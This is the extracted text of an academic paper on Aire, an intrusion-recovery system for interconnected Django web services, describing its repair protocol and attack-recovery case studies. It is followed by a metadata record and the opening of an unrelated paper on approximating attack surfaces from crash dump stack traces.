needs to be deleted, what partially repaired state can the service expose? Removing b from the version history altogether would be inconsistent if the service does not provide any API to delete old versions, and might confuse clients that rely on past versions to be immutable. On the other hand, appending new versions to the history (i.e., writing a new fixed-up value) prevents Aire from repairing past responses. In particular, if a past request asked for a set of versions, Aire would have to send a new set of versions to that client (using replace_response) where the effects of b have been removed. However, if Aire extends that past version history by appending a new version that reverts b, this synthesized history would be inconsistent with the present history. One way to handle partial repair with a versioning API is to extend the API to support branches, similar to the model used by git [6]. With an API that supports branches, when a past request needs to be repaired, Aire can create a new branch that contains a repaired set of changes, and move the “current” pointer to the new branch, while preserving the original branch. This allows the API to handle partially repaired states, and has the added benefit between when local repair on S3 completed (which is sometime between t2 and t3) and when A finally receives the replace_response message; A sees this state as valid (with its first get(x) returning b and its second get(x) returning a), because a hypothetical repair client could have issued a put(x, a) in the meantime. 5.2 Making service APIs repairable A web service with many concurrent clients that offers only a simple PUT/GET interface can handle partially repaired states, because clients cannot make any assumptions about the state of the service in the face of concurrency. However, some web service APIs provide stronger invariants that require application changes to properly handle partial repair. For example, some web services provide a versioning API that guarantees an immutable history of versions (as we discuss in §7.3). Suppose client A from our earlier example in Figure 2 asked the server for a set of all versions of X, instead of a get on the latest version. At time t2, A would receive the set of versions {a, b}. If repair simply rolled back the state of X between t2 and t3, A would receive the set of versions {a} at time t3 with b removed from the set, a state that no concurrent writer could have produced using the versioning API. The rest of this section describes how a developer can modify an application to handle partially repaired states, using a versioning interface as an example. Consider a web service API that provides a single, linear history of versions for an object. Once a client performs a put(x, b), the value b must appear in the history of values of x (until old versions are garbage-collected). If the put(x, b) was erroneous and needs to be deleted, what partially repaired state can the service expose? Removing b from the version history altogether would be inconsistent if the service does not provide any API to delete old versions, and might confuse clients that rely on past versions to be immutable. On the other hand, appending new versions to the history (i.e., writing a new fixed-up value) prevents Aire from repairing past responses. In particular, if a past request asked for a set of versions, Aire would have to send a new set of versions to that client (using replace_response) where the effects of b have been removed. However, if Aire extends that past version history by appending a new version that reverts b, this synthesized history would be inconsistent with the present history. One way to handle partial repair with a versioning API is to extend the API to support branches, similar to the model used by git [6]. With an API that supports branches, when a past request needs to be repaired, Aire can create a new branch that contains a repaired set of changes, and move the “current” pointer to the new branch, while preserving the original branch. This allows the API to handle partially repaired states, and has the added benefit For example, consider a simple key-value store that maintains a history of all values for each key, as illustrated in Figure 3. In addition to put and get calls, the key-value store provides a versions(x) call that returns all previous versions of key x. During repair, request put(x, b) is deleted. An API with linear history does not allow clients to handle partial repair (as discussed above), but a branching API does. With branches, repair creates a new branch (shown in the right half of Figure 3), and re-applies legitimate changes to that branch, such as put(x, c). These changes will create new versions on the new branch, such as v5 mirroring the original v3 (the application must ensure that version numbers themselves are opaque identifiers, even though we use sequential numbers in the figure). At the end of local repair, Aire exposes the repaired state, with the “current” branch pointer moved to the repaired branch. This change is consistent with concurrent operations performed through the regular web service API. For requests whose responses changed due to repair, Aire sends replace_response messages that contain the new responses: for a get request, the new response is the repaired value at the logical execution time of the request, and for a versions request, it contains only the versions created before the logical execution time of the request. In the example of Figure 3, the new response for get(x) is a (replacing b), while the new response for the versions(x) call is {v1, v2, v3, v5} (replacing {v1, v2, v3}), and does not contain v4 and v6. Figure 3: Repair of a single key in a versioned key-value store. Repair starts when the shaded operation put(x, b) from the original history, shown on the left, is deleted. This leads to the repaired history of operations shown on the right. The version history exposed by the API is shown in the middle, with two branches: the original chain of versions, shown with solid lines, and the repaired chain of versions, dotted. In each immutable version v:w, w is the version number and w is the value of the key. The mutable “current” pointer moves from one branch to another as part of repair. 6 Implementation We implemented a prototype of Aire for the Django web application framework [2]. Aire leverages Django’s HTTP request processing layer and its object-relational mapper (ORM). The ORM abstracts data stored in an application’s database as Python classes (called “models”) and relations between them; an instance of a model is called a model object. We modified the Django HTTP request processor and the Python httplib library functions to intercept incoming and outgoing HTTP requests, assign IDs to them, and record them in the repair log. To implement versioning of model objects, we modified the Django ORM to intercept the application’s reads and writes to model objects. On a write, Aire transparently creates a new version of the object, and on a read, it fetches the latest version during normal execution and the correct past version during local repair. Aire rolls back a model object to time t by deleting all versions after t. In addition to tracking dependencies between writes and reads to the same model, Aire also tracks dependencies between models (such as unique key and foreign key relationships) and uses them to propagate repair. We modified about 3,000 lines of code in Django to implement the Aire interceptors; the Aire repair controller was another 2,800 lines of Python code. Repair for a versioned API. If a service implements versioning, it indicates this to Aire by making the model class for its immutable versions a subclass of Aire’s AppVersionedModel class. AppVersionedModel objects are not rolled back during repair, and Aire does not perform versioning for these objects. If other model objects store references to AppVersionedModel objects, Aire rolls those other objects back during repair. 7 Application case studies This section answers the following questions: - What kinds of attacks can Aire recover from? - How much of the system is repaired if some services are offline or authorization fails at a service? - How much effort is required to start using Aire in an existing application? 7.1 Intrusion recovery As we do not know of any significant compromises that propagated through interconnected web services to date, to evaluate the kinds of attacks that Aire can handle, we implemented four attack scenarios and attempted to recover from each attack using Aire. The rest of this subsection describes these scenarios and how Aire handled the attacks. Askbot. A common pattern of integration between web services is to use OAuth or OpenID providers like Facebook, Google, or Yahoo, to authenticate users. If an attacker compromises the provider, she can spread an attack to services that depend on the provider. To demonstrate that Aire can recover from such attacks, we evaluated Aire using real web applications, with an attack that exploits a vulnerability similar to the ones recently discovered in Facebook [9, 10]. The system for the scenario consists of three large open-source Django web services: Askbot [1], which is an open-source question and answer forum similar to Stack Overflow and used by sites like the Fedora Project; Dpaste, a Django-based pastebin service, which allows posting and sharing of code snippets; and a Django-based OAuth service. These three services together comprise 183,000 lines of Python code, excluding blank lines and comments. Askbot maintains a significant amount of state, including questions and answers, tags, user profiles, ratings, and so on, which Aire must repair. We modified Askbot to integrate with Django OAuth and Dpaste, which it did not do out-of-the-box; these modifications took 74 and 27 lines of Python code, respectively. The attack scenario is shown in Figure 4. We configured Askbot to allow users to sign up using accounts from an external OAuth provider service that we set up for this purpose. A user’s signup in our Askbot setup is depicted by the requests 2-4 in Figure 4. As is typical in an OAuth handshake, Askbot redirects the user to the OAuth provider service. The user logs in to the OAuth service, and the OAuth service grants an OAuth token to Askbot if the user allows it to do so. To keep Figure 4 simple, only the first request in the OAuth handshake (request 2) is shown. Once Askbot gets an OAuth token for the user, it allows the user to register with an email address (request 3) that it verifies with the OAuth service using the user’s OAuth token (request 4). If the verification succeeds, Askbot creates a local account for the user and allows the user to post and view questions and answers. In addition to OAuth integration, we also modified Askbot to integrate with Dpaste; if a user’s Askbot post contains a code snippet, Askbot posts this code to the Dpaste service for easy viewing and downloading by other users. Finally, the Askbot service also sends users a daily email summarizing that day’s activity. These loosely coupled dependencies between the services mimic the dependencies that real web services have on each other. The attack we simulate in this scenario is based on a recent Facebook vulnerability [9]. To enable the attack, we added a debug configuration option in the OAuth service that always allows email verification to succeed (adding this option required modifying 13 lines of Python code in the OAuth service). This option is mistakenly turned on in production by the administrator by issuing request 1, thus exposing the vulnerability. The attacker exploits this vulnerability in the OAuth service to sign up with Askbot as a victim user (requests 2-4) and post a question with some code (request 5), thereby spreading the attack from the OAuth service to Askbot. Askbot automatically posts this code snippet to Dpaste (request 6), spreading the attack further. Later, a legitimate user views and downloads this code from Dpaste, and at an even later time, Askbot sends a daily email summary containing the attacker’s question, creating an external event that depends on the attack; both of these events are not shown in the figure. Before, after, and during the attack, other legitimate users continue to use the system, logging in, viewing and posting questions and answers, and downloading code from the Dpaste service. Some actions of these legitimate users, such as posting their own questions, are not dependent on the attack, while others, such as reading the attacker’s question, are dependent. We used Aire to recover from the attack. The administrator starts repair by invoking a delete operation on request 1, which introduced the vulnerability. The delete is shown by the dotted arrow corresponding to 1 in Figure 4. This initiates local repair on the OAuth service, which deletes the misconfiguration, and invokes a replace_response operation on request 4 with an error value for the new response. The replace_response propagates repair to Askbot: as requests 3 and 5 depend on the response to request 4, local repair on Askbot re-executes them using the new error response, thereby undoing the attacker’s signature (request 3) and the attacker’s post (request 5). Local repair on Askbot also runs a compensating action for the daily summary email, which notifies the Askbot administrator of the new email contents without the attacker’s question; it re-executes all legiti- mate user requests that depended on the attack requests; and finally it invokes a delete operation on Dpaste to cancel request 6. Dpaste in turn performs local repair, resulting in the attacker’s code being deleted, and a notification being sent to the user who downloaded the code. This completes recovery, which removes all the effects of the attack and does not change past legitimate actions in the system that were not affected by the attack. **Lax permissions.** A common source of security vulnerabilities comes from setting improper permissions. In a distributed setting, we consider a scenario where one service maintains an authoritative copy of an access control list, and periodically updates permissions on other services based on this list, similar to the example presented in §1 to motivate the need for Aire. If a mistake is made in the master list, it is important not only to propagate a remedy to other services, but also to undo any requests that took advantage of the mistake on those services. Since Askbot did not natively support such a permission model, we implemented our own spreadsheet service for this scenario. The spreadsheet service has a simple scripting capability similar to Google Apps Script [12]. This allows a user to attach a script to a set of cells, which executes when values in cells change. We use scripting to implement a simple distribution mechanism for access control lists (ACLs). The setup is shown in Figure 5. The ACL directory is a spreadsheet service that stores the master copy of the ACL for the other two spreadsheet services. A script on the directory updates the ACLs on the other services when an ACL on the directory is modified. The attack is as follows: an administrator mistakenly adds an attacker to the master copy of the ACL by issuing a request to update the ACL directory; the ACL script distributes the new ACL to spreadsheets A and B. Later, the attacker takes advantage of these extra privileges to corrupt some cells in both spreadsheets. All this happens while legitimate users are also using the services. Once the administrator realizes his mistake, he initiates repair by invoking a delete operation on the ACL directory to cancel his update to the ACL. The ACL directory reverts the update, and invokes delete on the two requests made by its script to distribute the corrupt ACL to the two services. This causes local repair on each of the two services, which rolls back the corrupt ACL. All the requests since the corrupt ACL’s distribution are re-executed, as every request to the service checks the ACL. As the attacker is no longer in the ACL, her requests fail, whereas the requests of legitimate users succeed; Aire thereby cleans up the attacker’s corrupt updates while preserving the updates made by legitimate users. **Lax permissions on the configuration server.** A more complex form of the above attack could take place if the ACL directory itself is misconfigured. For example, suppose the administrator does not make any mistakes in the ACLs in the directory, but instead accidentally makes the directory world-writable. An adversary could then add herself to the master copy of the ACL for spreadsheets A and B, wait for updates to propagate to A and B, and then modify data in those spreadsheets as above. Recovery in this case is more complicated, as it needs to revert the attacker’s changes to the ACL directory in addition to the spreadsheet servers. Repair is initiated by the administrator invoking a delete operation on his request that configured the ACL directory to be world-writable. This initiates local repair on the ACL directory, reverting its permissions to what they were before, and cancels the attacker’s request that updated the ACL. This triggers the rest of the repair as in the previous scenario, and fully undoes the attack. **Propagation of corrupt data.** Another common pattern of integration between services is synchronization of data, such as notes and documents, between services. If an attack corrupts data on one service, it automatically spreads to the other services that synchronize with it. To evaluate Aire’s repair for synchronized services, we reused the spreadsheet application and the setup from the previous scenarios, and added synchronization of a set of cells from spreadsheet service A to spreadsheet service B. A script on A updates the cells on B whenever the cells on A are modified. As before, the attack is enabled by the administrator mistakenly adding the attacker to the ACL. However, the attacker now corrupts a cell only in service A, and the script on A automatically propagates the corruption to B. Repair is initiated, as before, with a delete operation on the ACL directory. In addition to the repair steps performed in the previous scenario, after service A completes its local repair, it invokes a delete operation on service B to cancel the synchronization script’s update of B’s cell. This reverts the updates made by the synchronization, thereby showing that Aire can track and repair attacks that spread via data synchronization as well. ### 7.2 Partial repair propagation Repair might not propagate to all services if some services are offline during repair or a service rejects a repair. ![Diagram of ACL directory server and spreadsheet services](image) message as unauthorized. To evaluate Aire’s partial repair due to offline services, we re-ran the Askbot repair experiment with Dpaste offline during repair. Local repair runs on both the OAuth and Askbot services; the vulnerability in the OAuth service is fixed and the attacker’s post to Askbot is deleted. Clients interacting with the OAuth and Askbot services see the state with the attacker’s post deleted, which is a valid state, as this could have resulted due to a concurrent operation by another client. Most importantly, this partially repaired state immediately prevents any further attacks using that vulnerability, without having to wait for Dpaste to be online. Once Dpaste comes online, repair propagates to it and deletes the attacker’s post on it as well. When we re-ran the experiment and never brought Dpaste back online, Aire on Askbot timed out attempting to send the delete message to Dpaste, and notified the Askbot administrator, so that he could take remedial action. We also ran the spreadsheet experiments with service B offline. In all cases, this results in local repair on service A, which repairs the corrupted cells on A, and prevents further unauthorized access to A. Once B comes online and the directory server or A or both propagate repair to it (depending on the specific scenario), B is repaired as well. Similar to the offline scenario in Askbot, clients accessing the services at any time find the services’ state to be valid; all repairs to the services are indistinguishable from concurrent updates. Finally, we used the spreadsheet experiments to evaluate partial repair due to an authorization failure of a repair message. We use an OAuth-like scheme for spreadsheet services to authenticate each other—when a script in a spreadsheet service communicates with another service, it presents a token supplied by the user who created the script. The spreadsheet services implement an access control policy that allows repair of a past request only if the repair message has a valid token for the same user on whose behalf the request was originally issued. We ran the spreadsheet experiments and initiated repair after the user tokens for service B have expired. This caused service B to reject any repair messages, and Aire effectively treats it as offline; this results in partially repaired state as in the offline experiment described before. On the next login of the user who created the script, the directory service or A (depending on the experiment) presents the user with the list of pending repair messages. If the user refreshes the token for service B, Aire propagates repair to B, repairing it as well. The results of these three experiments demonstrate that Aire’s partial repair can repair the subset of services that are online, and propagate repair once offline services or appropriate credentials become available. <table> <thead> <tr> <th>Service</th> <th>Simple CRUD</th> <th>Versioned</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Amazon S3</td> <td>✓</td> <td>✓</td> <td>Simple file storage</td> </tr> <tr> <td>Google Docs</td> <td>✓</td> <td>✓</td> <td>Office applications</td> </tr> <tr> <td>Google Drive</td> <td>✓</td> <td>✓</td> <td>File hosting</td> </tr> <tr> <td>Dropbox</td> <td>✓</td> <td>✓</td> <td>File hosting</td> </tr> <tr> <td>Github</td> <td>✓</td> <td></td> <td>Project hosting</td> </tr> <tr> <td>Facebook</td> <td>✓</td> <td></td> <td>Social networking</td> </tr> <tr> <td>Twitter</td> <td></td> <td></td> <td>Social microblogging</td> </tr> <tr> <td>Flickr</td> <td>✓</td> <td></td> <td>Photo sharing</td> </tr> <tr> <td>Salesforce</td> <td>✓</td> <td></td> <td>Web-based CRM</td> </tr> <tr> <td>Heroku</td> <td>✓</td> <td></td> <td>Cloud apps platform</td> </tr> </tbody> </table> Table 3: Kinds of interfaces provided by popular web service APIs to their clients. 7.3 Porting applications to use Aire Porting an application to use Aire involves changes both on the client and the server side of that application’s interface. This section explores the two in turn, demonstrating that Aire requires little changes to both client-side and server-side code to support repair. Client-side porting effort. Clients of an Aire-enabled service must be prepared to deal with partially repaired states. To understand what would be involved for a client to handle such states, we examine the interfaces of 10 popular web services for operations that might expose inconsistencies as a result of partial repair. We found that the APIs fell into two categories, as shown in Table 3. Every service offered a simple CRUD (create, read, update, delete) interface on the resource objects exported by the service. There is no concurrency control for the simple CRUD operations, and if multiple updates happen simultaneously, the last update wins. For such services, handling partial repair in a client boils down to assuming there is an additional repair client that can perform updates at any moment. In many situations, clients are already prepared to deal with concurrent updates from other clients, and thus would require little additional effort to support Aire. Half of the services studied also provide a versioning API to deal with concurrent updates, typically exposing a linear history of immutable versions for each resource. These APIs allow clients to fetch a resource’s version list, to perform an update only if a resource is at the right version, and to restore a resource to a past version (which creates a new version with the contents of the past version). In this case, the interface would have to be changed to support branching, as discussed in §5.2 (for services that don’t already support it). The client would then be able to assume that existing versions on a branch are immutable, but that the current branch pointer could be switched by a concurrent repair client at any time. Server-side porting effort. To evaluate the effort of adopting server-side application code to use Aire, we measure the lines of code we changed in the Askbot, Dpaste, and Django OAuth applications to support Aire as described in §7.1. These three applications comprise 183,000 lines of code in total, excluding comments and blank lines. To run these applications with Aire, we added an `authorize` function to implement a repair access control policy. The policy allows repair of a past request only if the repair message is issued on behalf of the same user who issued the past request. Implementing the `authorize` function took 55 lines of Python code. For the spreadsheet application, we used the same access control policy and `authorize` implementation. We also implemented support for user-initiated retry of repair, using the `notify` and `retry` interface, which we used in our partial repair experiments (§7.2). Adding this capability to the spreadsheet application required 26 lines of code (for comparison, the entire spreadsheet application is 925 lines of code). To evaluate the difficulty of implementing an Aire-compatible service with a versioning API, we again used our spreadsheet example application. We first implemented a simple linear versioning scheme, where each version is just an incrementing counter. We then extended it to support version trees so that clients could handle Aire’s partial repair. This involved adding parent and timestamp fields to each version, and a pointer to the current version for each cell. This required modifying 44 lines of code. 8 Performance evaluation To evaluate Aire’s performance, this section answers the following questions: - What is the overhead of Aire during normal operation, in terms of CPU overhead and disk space? - How long does repair take on each service, and for the entire system? We performed experiments on a server with a 2.80 GHz Intel Core i7-860 processor and 8 GB of RAM running Ubuntu 12.10. As our prototype’s local repair is currently sequential, we used a single core with hyperthreading turned off to make it easier to reason about overhead. 8.1 Overhead during normal operation To measure Aire’s overhead during normal operation, we ran Askbot with and without Aire under two workloads: a write-heavy workload that creates new Askbot questions as fast as it can, and a read-heavy workload that repeatedly queries for the list of all the questions. During both workloads, the server experienced 100% CPU load. Table 4 shows the throughput of Askbot in these experiments, and the size of Aire’s logs. Aire incurs a CPU overhead of 19% and 30%, and a per-request storage overhead of 5.52 KB and 9.24 KB (or 8 GB and 12 GB per day) for the two workloads, respectively. One year of logs should fit in a 3 TB drive at this worst-case rate, allowing for recovery from attacks during that period. 8.2 Repair performance To evaluate Aire’s repair performance, we used the Askbot attack scenario from §7.1. We constructed a workload with 100 legitimate users and one victim user. The attacker signs up as the victim and performs the attack; during this time, each legitimate user logs in, posts 5 questions, views the list of questions and logs out. Afterwards, we performed repair to recover from the attack. The results of the experiment are shown in Table 5. The two requests repaired in the OAuth service are requests 1 and 4 in Figure 4, and the one request repaired in Dpaste is request 6. The repair messages sent by OAuth and Askbot are the `replace_response` for request 4 and the `delete` for request 6, respectively. Askbot does not send `replace_response` for requests 3 and 5, as the attacker browser’s requests do not include an `Aire-Notifier-URL` header. Local repair on Askbot re-executes only the requests affected by the attack (105 out of the 2196 total requests), which results in repair taking less than half the time taken for original execution. The attack affects so many requests because the attack question was posted at the beginning of the workload, so subsequent legitimate users’ requests to view the questions page depended on the attack request that posted the question. These requests are re-executed when the attacker’s request is canceled, and their repaired responses do not contain the attacker’s question. Aire on Askbot does not send `replace_response` messages for these requests as the user’s browsers did not include an `Aire-Notifier-URL` header. Repair takes longest on Askbot, and it is the last to finish local repair. In our unoptimized prototype, repair for each request is $\sim 10 \times$ slower than normal execution. This is because the repair controller and the replayed web service are in separate processes and communicate with each other for every Django model operation; optimizing the communication by co-locating them in the same process should improve repair performance. 9 Discussion and limitations Aire recovers the integrity of a system after an attack by undoing unauthorized writes, but it cannot undo damage resulting from unauthorized reads, such as an attack that leaked confidential information. However, Aire could be extended to help an administrator identify leaks, so he can take remedial action—for example, if the administrator marked confidential data for Aire, Aire could notify him of reads that returned confidential data only during original execution but not during repair. Aire’s repair log and database of versioned Django model objects grow in size over time, and eventually garbage collection of old versions becomes necessary. When the administrator of a service determines that logs prior to a particular date are no longer needed, Aire performs garbage collection by deleting repair logs and versions of database rows before that date. Once garbage collection is done, Aire cannot repair requests to the service prior to that date; if a client issues a repair operation on a request whose logs were garbage collected, Aire treats the service as permanently unavailable and notifies the client’s administrator. Our current prototype does not support simultaneous normal execution and repair. When repair is invoked on a service, Aire stops normal operation, switches the service into repair mode, completes local repair, and switches it back to normal operation. Our implementation could be extended to support simultaneous normal execution and repair similar to Warp’s repair generations [7]. 10 Related work The two closest pieces of work to Aire are the Warp [7] and Dare [16] intrusion recovery systems. Warp focuses on recovery in a single web service and is the inspiration for Aire’s local recovery. Aire additionally tracks attacks that spread across services and recovers from them, and defines a model for reasoning about partially repaired state. Dare performs intrusion recovery on a cluster of machines. However, Dare’s repair is synchronous and assumes that all machines are in the same administrative domain; both of these design decisions are incompatible with web services, unlike Aire’s asynchronous repair. Some web services, like Google Docs and Dropbox, already allow a user to roll back their files and documents to a previous version. Aire provides a more powerful recovery mechanism that tracks the spread of an attack across services and undoes all effects of the attack while preserving subsequent legitimate changes. After a compromise, Polygraph [19] recovers the non-corrupted state in a weakly consistent replication system by rolling back corrupted state. However, unlike Aire, it does not attempt to preserve the effects of legitimate actions, which can lead to significant data loss. Heat-ray [8] considers the problem of attackers propagating between machines within a single administrative domain, and suggests ways to reduce trust between machines. On the other hand, Aire is focused on attackers spreading across web services that do not have a single administrator, and allows recovery from intrusions. Techniques such as Heat-ray’s could be helpful in understanding and limiting the ability of an adversary to spread from one service to another. Akkus and Goel’s system [5] uses taint tracking to analyze dependencies between HTTP requests and database elements, and uses administrator guidance to recover from data corruption. However, unlike Aire, it can recover only from accidental corruption and not attacks, and it cannot handle attacks that spread across services. The user-guided recovery system of Simmonds et al. [21] recovers from violations of application-level invariants in a web service and uses compensating actions and user input to resolve these violations. However, it cannot recover from attacks or accidental data corruption. Past work on distributed debugging [4] intercepts executions of unmodified applications and tracks dependencies for performance debugging, whereas Aire tracks dependencies for recovery. 11 Conclusion This paper presented Aire, an intrusion recovery system for interconnected web services. Aire introduced three key techniques for distributed repair: (1) a repair protocol to propagate repair across services that span administrative domains, (2) an asynchronous approach to repair that allows each service to perform repair at its own pace without waiting for other services, and (3) a contract that helps developers reason about states resulting from asynchronous repair. We built a prototype of Aire for Django and demonstrated that porting existing applications to Aire requires little effort, that Aire can recover from four realistic attack scenarios, and that Aire’s repair model is supported by typical web service APIs. Acknowledgments We thank Frans Kaashoek, Eddie Kohler, the anonymous reviewers, and our shepherd, Michael Walfish, for their help and feedback. This research was supported by the DARPA Clean-slate design of Resilient, Adaptive, Secure Hosts (CRASH) program under contract #N66001-10-2-4089, and by NSF award CNS-1053143. References
{"Source-Url": "http://dspace.mit.edu/openaccess-disseminate/1721.1/91473", "len_cl100k_base": 15414, "olmocr-version": "0.1.50", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 53409, "total-output-tokens": 17115, "length": "2e13", "weborganizer": {"__label__adult": 0.0004167556762695313, "__label__art_design": 0.000568389892578125, "__label__crime_law": 0.0012483596801757812, "__label__education_jobs": 0.0011348724365234375, "__label__entertainment": 0.000156402587890625, "__label__fashion_beauty": 0.00019609928131103516, "__label__finance_business": 0.0003826618194580078, "__label__food_dining": 0.00033473968505859375, "__label__games": 0.0009918212890625, "__label__hardware": 0.00115203857421875, "__label__health": 0.000598907470703125, "__label__history": 0.0003972053527832031, "__label__home_hobbies": 9.22083854675293e-05, "__label__industrial": 0.000377655029296875, "__label__literature": 0.0004584789276123047, "__label__politics": 0.0003712177276611328, "__label__religion": 0.00039315223693847656, "__label__science_tech": 0.1068115234375, "__label__social_life": 0.00015270709991455078, "__label__software": 0.0396728515625, "__label__software_dev": 0.84326171875, "__label__sports_fitness": 0.00020682811737060547, "__label__transportation": 0.0003712177276611328, "__label__travel": 0.00019156932830810547}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 79639, 0.0138]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 79639, 0.04106]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 79639, 0.92137]], "google_gemma-3-12b-it_contains_pii": [[0, 2113, false], [2113, 6339, null], [6339, 11957, null], [11957, 16813, null], [16813, 22612, null], [22612, 28371, null], [28371, 34250, null], [34250, 39884, null], [39884, 45575, null], [45575, 50165, null], [50165, 55022, null], [55022, 60353, null], [60353, 66271, null], [66271, 70709, null], [70709, 76146, null], [76146, 79639, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2113, true], [2113, 6339, null], [6339, 11957, null], [11957, 16813, null], [16813, 22612, null], [22612, 28371, null], [28371, 34250, null], [34250, 39884, null], [39884, 45575, null], [45575, 50165, null], [50165, 55022, null], [55022, 60353, null], [60353, 66271, null], [66271, 70709, null], [70709, 76146, null], [76146, 79639, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 79639, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 79639, null]], "pdf_page_numbers": [[0, 2113, 1], [2113, 6339, 2], [6339, 11957, 3], [11957, 16813, 4], [16813, 22612, 5], [22612, 28371, 6], [28371, 34250, 7], [34250, 39884, 8], [39884, 45575, 9], [45575, 50165, 10], [50165, 55022, 11], [55022, 60353, 12], [60353, 66271, 13], [66271, 70709, 14], [70709, 76146, 15], [76146, 79639, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 79639, 0.10932]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
1c6ce850b764520803fb28815fff36025f5ae843
Attack Surface Prioritization with Crash Dump Stack Traces Author’s Name, Affiliation Author’s Name, Affiliation Author’s Name, Affiliation Author’s Name, Affiliation Author’s Name, Affiliation Abstract Resource limitations often preclude security professionals from reviewing, testing, and fortifying an entire code base. Identifying metrics that enable prioritization of security efforts would help practitioners discover security issues more efficiently. Risk-Based Attack Surface Approximation (RASA) makes use of crash dump stack trace from a targeted software system to provide an estimated attack surface. In this paper, we extend the RASA approach, to develop a series of metrics that could help identify how the attack surface changes and if areas of the attack surface have more dangerous vulnerabilities. The goal of this research is to aid software engineers in approximating the attack surface of software systems by developing metrics based on crash dump stack traces. In this paper, we present the RASA approach and three metrics based on crash dump stack traces: change, complexity, and boundary metrics. We parsed 24.5 million stack traces from Windows 8, 8.1, and 10 for inclusion in our study. With change metrics, we help security professionals identify code that has fallen off or been added to the attack surface for the target system. For example, 58.7% of code that was seen on crash dump stack traces changed from Windows 8.1 to Windows 10. With complexity metrics, we measure fan-in and fan-out measures from crash dump stack traces to determine whether certain vulnerabilities are more impactful than others. With boundary metrics, we determine where the boundary of the software system is, or where crash dump stack traces indicate entry and exit points to the system might be. We determined that only 4% of vulnerabilities fixed for Windows 8.1 appeared on the boundary of the system. 1. Introduction For security teams, prioritizing code to review and/or test can improve a team’s ability to find and remove vulnerabilities. Some organizations may choose to prioritize security efforts based on their perception or knowledge of whether the vulnerability is on the attack surface of a system. Researchers have suggested methods for identifying the attack surface of a system in an efficient manner for practitioners [1-4]. However, identifying code on the attack surface of a system is only a partial solution. Beyond the attack surface, how should security professionals prioritize efforts? Many organizations already collect empirical metrics for their software systems, such as crash dump stack traces. In this work, we propose that organizations use this existing dataset to prioritize security efforts. In this paper, we generate metrics derived from crash dump stack traces to help practitioners further prioritize their efforts. We hypothesize that: Crash dump stack traces could be used to approximate how the attack surface of a system changes over time. Crash dump stack traces can be collected over the lifespan of software systems. By comparing traces from different versions of software systems, security professionals can observe how the profile of crashing code has changed, and use that information to update their understanding of critical security points in the system. Similar analysis can be performed between different time periods of development. Crash dump stack traces can identify flawed data paths in a software system, and identify which code artifacts carry more risk of being exploited. By providing fan-in (number of incoming calls to code) and fan-out (number of outgoing calls from code) measurements based on crash dump stack traces to security professionals, we can express whether a specific code artifact is more or less exposed to flawed data paths. Because we know that any crash dump stack trace indicates some sort of flaw, an increase in fan-in and fan-out numbers based on crash dump stack traces indicates potentially riskier code. Finally, code on entry and exit points of a software system is more likely to contain security vulnerabilities than the rest of the codebase. While some researchers have focused on identifying entry and exit points, or boundary, to secure [5], others have advocated for a defense-in-depth approach to security [6]. Crash dump stack traces can identify the boundary of a software system by identifying where the traces change from external code to system code. To evaluate these hypotheses, we pose the following research questions: **RQ1:** How effectively can stack traces to be used to approximate the attack surface of a system? **RQ2:** How does the code that is seen on crash dump stack traces drop off, get added, and stay the same across versions and during development of software systems? **RQ3:** How are security vulnerabilities correlated with code complexity, as measured by fan-in and fan-out metrics? **RQ4:** How often are vulnerabilities seen on the entry and exit points of a software system compared to the rest of the codebase? We analyzed 24.5 million stack traces from crash dumps from Windows 8, 8.1, and 10 from 2014 and 2015, and developed metrics in three categories: change metrics, complexity metrics, and boundary metrics. We correlated these metrics with security vulnerabilities found in the Windows codebase over the same time period. This correlation was used to make observations about the effectiveness of each metric. We include the following as contributions in this paper: - An exploration of the change in attack surface over time, as determined by crash dump stack traces. - Results from a case study indicating the impact of vulnerabilities in a software system and the complexity of specific file. - A database scheme to facilitate repeatable analysis of crash dump stack traces against vulnerability locations. The rest of the paper is organized as follows: Section 2 discusses background and related work, Section 3 presents our methodology, Section X discusses the specific case study presented in this work, Section X presents our results, Section X contains discussion of these results, Section X discusses our lessons learned and challenges, Section X presents limitations and threats to validity, and Section X discusses future work, and Section X concludes. ### 2. Related Work Vulnerabilities are a special case of software defects [7]. Vulnerabilities tend to be sparser than general software defects [8], as not all defects may allow an attacker to gain anything. In this section, we provide a brief overview of related work. ### 2.1. Attack Surface Howard et al. [9] provided the seminal definition of attack surface using three dimensions: targets and enablers, channels and protocols, and access rights. Not all areas of a system may be directly or indirectly exposed to the outside. Some parts of a complex system, such as the Windows operating system, may be for internal use only and cannot be reached or exploited by an attacker. Knowing the attack surface of a piece of software supports decision-making during all phases of software development. To date, approaches to empirical measurement of attack surfaces have relied on manual effort or on alternative definitions of ‘attack surface’. Tools like Microsoft’s Attack Surface Analyzer⁴ determine where potential input vectors exist on a system. However, this tool currently focuses on delivered systems that are code-static; it detects configuration changes, not code changes. Manadhata et al. [1] describe how an attack surface might be approximated by looking at API entry points. However, this approach does not cover all exposed code, as the authors mention. Specifically, internal flow of data through a system could not be identified. While the external points of a system are a useful place to start, they do not encompass the entirety of exposed code in the system. These intermediate points within the system could also contain security vulnerabilities that 